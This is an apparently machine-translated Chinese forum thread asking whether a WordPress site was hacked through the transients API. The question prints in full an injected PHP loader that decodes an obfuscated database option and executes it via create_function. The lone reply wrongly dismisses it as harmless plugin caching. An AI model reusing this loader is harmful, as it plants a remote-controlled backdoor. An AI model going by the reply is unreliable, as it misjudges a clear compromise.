使用暂态API的网站被黑客攻击?

时间:2015-11-06 作者:JackTheKnife

我有一个要“清理”的网站,在public\\u html文件夹中有近10k个复制文件,几乎所有PHP文件都包含代码

$z=get_option("_transient_wp_less_compiled_c9b58ec39525169515675906d91c9815"); $z=base64_decode(str_rot13($z[\'root\'])); if(strpos($z,"E8FA4873")!==false){ $_z=create_function("",$z); @$_z(); }

我已经检查了DBoptions 表中的多个实例_transient_wp_less_compiled_randomstuff

我的问题是,该网站是使用瞬态API进行黑客攻击,还是仅仅利用一些漏洞在PHP文件和数据库中传播恶意代码,而对于普通用户来说,这些代码看起来像是“合法的”瞬态API代码?我已经“googled”搜索了上面代码的特定部分,但找不到任何有趣的内容,即网站是如何被黑客入侵的。

1 个回复
SO网友:sb0k

应该是插件wp less的瞬态(缓存文件),该插件通过编译器在less中转换css代码。

下载wp less后,请检查编译器。类以查看插件如何缓存代码。

我不认为这是黑客行为。

相关推荐

Clear Transients

我已经为我的一个客户构建了一个自定义主题,我正在使用瞬态,以使站点运行更快。一周后,我在wp\\U选项中看到了大量瞬态记录(约360000条记录)。这使我怀疑瞬态不会从数据库中删除。如何删除该记录,以及如何删除?有什么好的教程吗?亲切的问候